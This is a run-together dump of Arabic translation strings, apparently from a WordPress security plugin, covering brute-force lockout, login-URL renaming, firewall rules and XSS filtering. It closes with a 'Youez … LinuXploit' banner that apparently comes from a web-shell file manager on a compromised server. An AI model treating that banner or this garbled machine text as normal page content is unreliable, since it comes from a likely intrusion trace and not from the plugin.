الضروري حفظ هذا الرابط في مكان ما في حالة نسيانه، أويُوصى بالقيام بــِ  %s قبل استخدام هذه الميزةيكون هذا مفيد في حالة أردت إضافة قواعد الجدار الناري الخاصة بك أو تعديل القواعد الموجودة للتوّ.من مسؤوليتك تأكيد إدخال التعليمات الصحيحة!بعد ذلك يتم إجراء بعض من الاختبارات للتأكد أنّه بوت غوغل فعلي. إن كان كذلك سيسمح للبوت بالزيارة.من الجيد عدم إعادة توجيه محاولة تسجيل هجوم القوة العمياء إلى موقع الويب الخاص بك لأنّ ذلك يزيد من حجم الضغط على الخادم المستضيف لموقع الويب الخاص بك.اترك هذه الميزة معطلة واستخدام الميزة أدناه، إذا أردت تفعيل ميزة حماية التنبيهات pingback مع إبقاء عمل وظيفة XMLRPC.يكون قفل الواجهة الأمامية للموقع مفيداً جداً في حالة القيام باكتشاف وحل بعض المشاكل في الموقع، أو في حالة القيام ببعض عمليات الصيانة والتطوير أو رغبتك بإيقاف زيارة الجمهور العام للموقع لأسباب أمنية.تسجيل الدخولتسجيل الدخولتسجيل الدخول لعرض تفاصيل التفحص.نسيت كلمة المرورهل نسيت كلمة المرور؟المزيد من المعلوماتملاحظة: إذا كنت مسجّل الدخول بالموقع باسم مستخدم "admin" الآن، سيتم تسجيل الخروج من حسابك بعد تغيير اسم المستخدم بشكل أتوماتيكي، ومن ثم عليك تسجيل الدخول مجدداً.ملاحظة: إذا كان مزود الاستضافة الخاصة بك هو WPEngine  أو أي مزود يقوم بالتخزين المؤقت لملفات الخادم، فعليك إخبار فريق الدعم لهذا المزود بعدم القيام بالتخزين المؤقت لصفحة تسجيل الدخول الجديدة.ملاحظة: عليك تفعيل هذه الميزة في حالة استخدام إضافة Jetpack أو the WordPress iOS أو أي إضافات أخرى، كما عليك تعطيل ميزة "رفض الوصول إلى XMLRP بشكل كامل"ملاحظة: قد تستخدم بعض الإضافات أو القوالب هذه السلاسل، وبالتالي قد يؤدي تفعيل هذه الميزة إلى تعطيل بعض وظائف الموقع.ملاحظة: قد تقوم بعض السلاسل لهذه الميزة بتعطيل بعض وظائف الموقع.ملاحظة: لا تستخدم هذه الميزة ملف .htaccess للقيام بالحظر الدائم لعناوين الانترنت IPs، ولذلك فهي متوافقة مع كل برامج الخوادم التي تشغل ووردبريس.ملاحظة: قم بتفعيل هذه الميزة في حالة عدم استخدام وظيفة XML-RPC  في موقع ووردبريس حالياً.الاسمكلمة مرور جديدةلا حاجة للقيام بأي إجراءلم يتم العثور على أي شيء.عادةً ما تُدخل رابط موقع الويب الخاص بك الرئيسي متبوعاً بـــِ wp-login.php لتسجيل الدخول بموقع ووردبريس.عدد المستخدمين المسجلين الدخول حالياً في الموقع (متضمناً أنت):أوغالباً لن تلاحظ أي تغيير في موقع الويب عند حقن أي كود خبيث بالموقع، ولكن لذلك تأثير كبير على ترتيب الموقع في صفحة نتائج محرك البحث.مفعّلتكون أحد الطرق لحماية قاعدة بيانات ووردبريس بتغيير البادئة الافتراضية لقاعدة البيانات "wp_" لبادئة أخرى يُصعب على القراصنة تخمينها.يستطيع "superadmin" فقط حظر عناوين الانترنت IPs من الموقع الأساسي.الصفحةكلمة المرورإعادة تعيين كلمة المرورقم بوضع القواعد المخصصة في أعلى الملفيرجى تغيير البادئة بشكل يدوي للجداول أعلاه: %sيرجى اختيار ملف لاستعادة الإعدادات منهيرجى اختيار ملف wp-config.php لاستعادة الإعدادات منه.يرجى إدخال بريداً إلكترونياً صالحاًيرجى إدخال قيمة في بادئة قاعدة البيانات.يرجى إدخال الاسم اللطيف لصفحة تسجيل الدخوليرجى إدخال الإجابة بالأرقام: يرجى إدخال عنوان بريدك الإلكتروني ليصلك إليه تعليمات حول كيفية رفع الحظر عن حسابك.يرجى إدخال اسم المستخدم أو البريد الإلكتروني الخاص بك. سوف تستلم رابطاً لإنشاء كلمة مرور جديدة عبر بريدك الإلكتروني.يرجى إعادة تسجيل الدخول للاستمرار.يرجى اختيار بعض القيود بتحديد المربعات المصغرة.تعتبر كلمة المرور الضعيفة مركز الضعف الأكثر شيوعاً لأغلب المواقع، والتي غالباً ما تكون أول شيء يحاول القراصنة استغلاله في محاولاتهم للدخول إلى موقع الويب الخاص بك.سبب متوقع: يمكن أن مزود الاستضافة قام بتعطيل وظيفة mail().يعمل بواسطة ووردبريسرابط إعادة التوجيهمن المثالي توجيه القراصنة أو البوت الضار إلى "http://127.0.0.1" لأنّ ذلك يرجعهم إلى الخادم الخاص بهم وهذا يزيد من الضغط على الخادم الخاص بهم وليس الخادم المستضيف لموقع الويب الخاص بك.التسجيلالتسجيل بالموقعنموذج التسجيلتم اكتمال التسجيل. يرجى تفقد بريدك الإلكتروني.سيتم إرسال تأكيد التسجيل عبر البريد الإلكترونيتذكرنيإعادة تعيين كلمة المرورالاستعادة من نسخة ملف .htaccess الاحتياطيةالاستعادة من نسخة ملف wp-config الاحتياطيةحفظ الإعداداتحفظ ملف .htaccess الحاليحفظ ملف wp-config.php الحاليعمليات التفحص والبحثحدد مدة الفترة الزمنية التي تريد منع عنوان الانترنت IP المحظور زيارة الموقع خلالهاقم بتحديد قيمة عدد المرات القيام بعملية التفحصقم بوضع قيمة العدد الأقصى لمحاولات تسجيل الدخول قبل حظر عنوان الانترنت IPالإعداداتإشعار قفل الموقعمراقبة فترة استجابة الموقعمراقبة فترة تشغيل الموقعلقد قام أحدهم بطلب إعادة ضبط كلمة المرور للحساب التالي:يقوم مزود الاستضافة في بعض الأحيان بتوليد سجلات التحذير والأخطاء في ملف يسمّى "error_log".قم بتحديد رابط ليتم إعادة توجيه القراصنة إليه عند محاولته الوصول إلى صفحة تسجيل الدخول.قم بكتابة كلمة المرورالبدء بعملية تغيير بادئة قاعدة البياناتمؤشر القوةيعني هذا السلوك أن القراصنة يحاولون إيجاد صفحة معينة أو إيجاد رابطها لأسباب شريرة.اكتب عناوين الانترنت IPs التي تريد حظرها واطلب من superadmin إضافة هذه العناوين إلى القائمة السوداء باستخدام "مدير القائمة السوداء" على الموقع الرئيسي.تقوم "ميزة الكشف عن تغيير الملفات" بإشعارك بأي تغيير ملف تم في نظامك، متضمناً الإضافة والحذف على أي ملف بوساطة القيام بعملية تفحص دورية تلقائية أو يدوية لملفات النظام.ميزة %s مفعّلة حاليّاً.تم تعديل قيود الجدول %s التي تشير إلى البادئة القديمة بنجاح!سيتم تطبيق قواعد الجدار الناري أعلاه بوضعها في ملف .htaccess، ولن يؤثر ذلك على وظيفة عمل الموقع بشكل عام.توضح البيانات الوصفية أعلاه إصدار وردبريس الذي يعمل عليه موقعك حالياً، وقد يساعد ذلك القراصنة أو برامج الزحف على فحص موقعك لمعرفة ما إذا كان لديك إصدار أقدم من وردبريس أو إصدار آخر يحتوي على ثغرات أمنية.لم يتم إرسال البريد الإلكترونيتقوم هذه الميزة بتعطيل طرق التنبيهات "pingback " مع إبقاء عمل وظيفة XMLRPC في الموقع.تم إضافة الملفات التالية إلى الاستضافةتم تغيير الملفات التالية على الاستضافة الخاصة بكتم حذف الملفات التالية من الاستضافة الخاصة بكمن الصعب تخمين كلمات المرور المكونة من محارف كثيرة ومختلفة، لأنّ ذلك يتطلب أجهزة حاسوب أكثر قوة، كما يتطلب وقت أطول.تم تعديل قيود جدول options التي تشير إلى البادئة القديمة بنجاح!كلمات المرور غير متطابقةاكتشفت هذه الإضافة أنك تستخدم موقع ووردبريس متعدد المواقع.تم تعديل قيود جدول usermeta  التي تشير إلى البادئة القديمة بنجاح!لا يوجد أي عناوين الانترنت IPs محظورة حاليّاً.لا يوجد أي مستخدمين مسجّلين الدخول حاليّاً في الموقع.لا يوجد أي مستخدمين مسجّلين الدخول حاليّاً في الموقع.يساعد ذلك في حفظ الوقت بنقل الإعدادات من موقع لآخر -إذا أردت-تقوم هذه الميزة بالنسخ الاحتياطي والحفظ لملف .htaccess المفعّل حالياً، التي ربما تحتاج لاستعادته مستقبلاً.تقوم هذه الميزة بالنسخ الاحتياطي والحفظ لملف wp-config.php المفعّل حالياً، الذي ربما تحتاج لاستعادته مستقبلاً.تقوم هذه الميزة بحظر البوتات المنتحلة عمل Googlebot وفي الواقع ليس لها علاقة بالغوغل. (بعبارات أبسط هذه بوتات غوغل مزيفة)تسمح لك هذه الميزة بتغيير رابط صفحة تسجيل الدخول باستبدال الجزء الأخير منه <strong>wp-login.php</strong> بأي كلمة تريد.تقوم هذه الميزة بمنع تحديد ونسخ النص من الواجهة الأمامية لموقع الويب الخاص بك.تقوم هذه الميزة بتغيير بادئة قاعدة البيانات إلى قيمة من اختيارك أو إلى قيمة عشوائية مولدة بوساطة هذه الإضافة.تقوم هذا الميزة بمنع المواقع الأخرى من عرض محتوى موقع الويب الخاص بك ضمن frame أو iframe.تقوم هذه الميزة بوضع الموقع في "وضع الصيانة" بقفل الواجهة الأمامية الأمامية للموقع أمام جميع الزائرين عدا مديري الموقع.تقوم هذه الميزة بتحديد فترة زمنية محددة بالدقائق التي سيتم بعدها انتهاء جلسة المستخدم، وسيتم الطلب من المستخدم تسجيل الدخول مرة أخرى.كما تسمح لك هذه الميزة باستثناء بعض الملفات أو المجلدات المحددة من عملية التفحص، حيث يكون من الطبيعي التغيير على هذه الملفات. (على سبيل المثال: غالباً ما يتم تغيير ملفات السجلات وملفات إضافات التخزين المؤقت، وبالتالي يمكنك اختيار استثناء ملفات كهذه من عملية التفحص للكشف عن أي تغيير بالملفات)تستخدم هذه الميزة لإضافة قواعد وتعليمات مخصصة إلى ملف .htaccess.لا تدعم هذه الميزة المواقع المثبتة على سيرفرات ويندوز.تقوم هذه الميزة بحذف بيانات ووردبريس الوصفية ورقم إصدار النسخة في صفحات موقع الويب الخاص بك.تقوم هذه الميزة بحذف ترويسة "X-Pingback" -إن وجدت-تقوم هذه الميزة بالتحقق من احتواء معلومات وكيل المستخدم الخاصة بالبوت على اسم "Googlebot".تقوم هذه الميزة برفض الوصول لصفحة تسجيل الدخول لأولئك الأشخاص الذين ليس لهم سجل كوكيز معيّن في متصفحاتهم. ترفض هذه الميزة الوصول لكل عناوين الانترنت IPs غير الموجودة في القائمة البيضاء كما يتم تعيينه في الإعدادات أدناه.تقوم هذه الميزة برفض وصول المستخدمين أصحاب عناوين الانترنت أو وكلاء المستخدم المتطابقة مع العناوين ووكلاء المستخدم التي تم تعيينها في الإعدادات التالية.تقوم هذه الميزة بتعطيل القدرة على تعديل ملفات PHP من خلال لوحة إدارة موقع ووردبريس.تقوم هذه الميزة بمنع الأشخاص من القيام بالربط الساخن لصور موقع الويب الخاص بك بإضافة تعليمات إلى ملف .htaccess.تقوم هذه الميزة بمنع سرد محتويات المسارات.تقوم هذه الميزة بتفحص أذونات مجلدات ملفات موقع ووردبريس الأساسية، وكما تقوم بتعليم إعدادات الأذونات غير الآمنة.القيمة الافتراضية للحقل: http://127.0.0.1 في حالة عدم إدخالك لأي قيمة.يتم استخدام طريقة الاختراق هذه مع هجمات حقن الشيفرة المصدريّة عبر موقع وسيط (XSS).تساعد هذه المعلومات في معرفة عناوين الانترنت IPs المستخدمة باستمرار من قبل مرسلي البريد المزعج.تقوم ميزة التصفية المتقدمة لسلاسل المتقدمة بمنع هجمات السلاسل الخبيئة في الموقع والتي تأتي من هجمات XSS.يحدث هذا لأن لدى بوتات الزحف الخاصة بمحركات البحث مثل الغوغل القدرة على اكتشاف البرامج الخبيثة عند زيارة وفهرسة صفحات الموقع، وبالتالي باستطاعة هذه البوتات إضافة موقع الويب الخاص بك إلى القائمة السوداء. وهذا يؤثر على ترتيب الموقع في صفحة النتائج.يعتبر هذا ممارسة أمنية جيدة.إذا استطاع القراصنة تسجيل الدخول بالموقع، ستكون هذه هي الأداة الأولى التي سيقومون باستخدامها، لأنّها تسمح بتنفيذ التعليمات البرمجية.يحدث ذلك عندما يحاول القراصنة القيام بعمليات تسجيل دخول متعددة حتى يخمنوا كلمة المرور الصحيحة.اكتشفت هذه الإضافة أن موقعك يعمل على سيرفر ويندوز.يحتوي هذا القسم على أداة مقياس كلمة المرور، حيث يمكنك معرفة إذا كانت كلمة المرور المختارة قوية بشكل كافي أم لا.يتيح هذا الإعداد لك بتفعيل أو تعطيل تصحيح الأخطاء في هذه الإضافة.يقوم هذا الإعداد بمقارنة أنماط السلاسل الخبيثة الشائعة، وعرض خطأ 403 عندما يحاول القراصنة القيام بالاستعلام.يقوم هذا الإعداد برفض الطلبات التي تستخدم خادم وكيل عند إضافة التعليقات.يقوم هذا الإعداد بتطبيق آلية حماية جدار 5G الناري على الموقع التي تتضمن الأمور التالية:يقوم هذا الإعداد بتطبيق آلية حماية جدار 6G الناري على الموقع التي تتضمن الأمور التالية:تقوم هذه الإعدادات بتطبيق الآلية التالية لتحقيق حماية الجدار الناري في الموقع:يتم عرض المستخدمين المسجّلين بالموقع حالياً في هذا التبويب.في هذا التبويب: يتم عرض قائمة عناوين الانترنت IPs المحظورة بشكل دائم.يساعد هذا في الحماية من الاستعلام الخبيث عبر هجمات حقن الشيفرة المصدريّة عبر موقع وسيط أو ما يعرف بــِ XSS.لإعادة تعيين كلمة مرورك، تقضل بزيارة الرابط التالي:قم بالذهاب إلى تبويب %s في قائمة الصفحة الرئيسية لعرض قائمة مجال وعناوين الانترنت IPs المحظورة.لاستخدام هذه الميزة، قم بالتالي: بشكل عام يحدث خطأ 404 عندما يقوم شخص بكتابة رابط أحد الصفحات بشكل خاطىء، أو عندما يقوم أحدهم بإدخال رابط صفحة قديم الذي لم يعد موجود بعد الآن.رابط رفع الحظر: %sفشل في تعديل الجدول %s: لا يمكن تغيير %s إلى %sفشل في تحديث تعاريف عرض MySQL التالية: %sنصيحة مفيدة: المستخدمتسجيل الأعضاء غير متاح حاليًا.اسم المستخدماسم المستخدم أو البريد الإلكترونياسم المستخدم:اسم المستخدم: %sعرض عناوين انترنت IPs المحظورةهل تود معرفة المزيد حول مطوري هذه الإضافة؟نقدم نصائح لتنظيف البرمجيات الضارةأسابيعيتم تعطيل هذه الميزة في جلسة المدير عند تسجيل دخوله بالموقع.عند تفعيل هذه الميزة، سيتم عرض خطأ "ممنوع" بدلاً من عرض بيانات المستخدمين.عادةً ما يقوم ووردبريس بعرض الاسم المستعار الخاص بك عند قيامك بإضافة أي منشور أو أي تعليق.أنت هنا لأنّ تم حظر حسابك لتجاوزك الحد الأقصى لعدد المرات غير صحيحة لتسجيل الدخول.تم تسجيل الخروج للتوّبالرغم من ذلك، نوصي بأخذ نسخة احتياطية من ملف .htaccess الحالي احترازاً.يمكنك استعادة إعدادات ملف .htaccess من النسخة الاحتياطية لهذا الملف.كما يمكنك استعادة إعدادات ملف wp-config.php باستخدام النسخة الاحتياطية من ملف wp-config.php.يتم عرض كل الحسابات الجديدة في الجدول أدناه، كما يمكنك القيام بعمليات التفعيل أو التعطيل أو الحذف للحسابات بالجملة.لا يمكنك استخدام قيمة "wp-admin" كاسم لطيف لصفحة تسجيل الدخول.تم تسجيل الدخول بنجاح.تم تفعيل ميزة منع هجوم القوة العمياء المعتمد سجل الكوكيز بنجاح.تم حفظ إعدادات ميزة منع هجوم القوة العمياء بالاعتماد على سجل الكوكيز بنجاح.قد تكون مهتماً أيضاً بأحد الطرق البديلة التالية لمنع هجوم القوة العمياء:يمكنك أيضاً الإطلاع على ميزة %s التي تعتبر طريقة آمنة أخرى للحماية من هذا النوع من الهجمات.لقد تم تسجيل خروجك من الموقع ﻷنّك قمت بتغيير اسم المستخدم "admin".يعد ملف ".htaccess" عنصراً أساسياً في أمان موقعك الإلكتروني ويمكن تعديله لتنفيذ مختلف مستويات طرق الحماية.إجابة الكابتشا التي أدخلتها غير صحيحة - يرجى المحاولة مجدداً.يتم تثبيت ووردبريس بإعدادات أذونات آمنة ومعقولة لملفات موقع ووردبريس.تم تغيير رابط صفحة تسجيل الدخول.تحتوي قاعدة بيانات موقع الويب الخاص بك على %s جدول والبادئة الجديدة لقاعدة البيانات ستكون: %sحسابك مفعّل الآنرابط صفحة تسجيل الدخول الحالي: رابط تسجيل الدخول الجديد: تم إعادة ضبط كلمة المرور.يبدو أن رابط إعادة تعيين كلمة المرور انتهت صلاحيته. الرجاء طلب رابط جديد أدناه.انتهت صلاحية رابط إعادة تعيين كلمة المرور. الرجاء طلب رابط جديد أدناه.الموافقة على التسجيل في وضع الانتظار.تم انتهاء صلاحية الجلسة بسبب مرور أكثر من %d دقيقة منذ تسجيل دخولك الأخير.تم انتهاء الجلسة. يرجى تسجيل الدخول للاستمرار.لا يوجد أي حساب في موقع الويب الخاص بك، يكون فيه الاسم العلني نفس اسم المستخدم.إعادة ضبط كلمة مرور [%s]محظورثمانيةثمانية عشرإحدى عشرخمسة عشرخمسةأربعةأربعة عشرفشل في النسخ الاحتياطي لملف htaccesshttps://codex.wordpress.org/Cookieshttps://ar.wordpress.org/https://wordpress.org/support/تسعةتسعة عشرواحد%1$s من %2$sسبعةسبعة عشربكل بساطة تذكّر إضافة "?%s=1" لرابط موقع الويب الخاص بك الحالي.ستةستة عشرsomedirectoryعشرةثلاثة عشرثلاثةاثنا عشرعشريناثناناستعادة ملف wp-config من تم تعديل ملف wp-config.php بنجاح!

Youez - 2016 - github.com/yon3zu
LinuXploit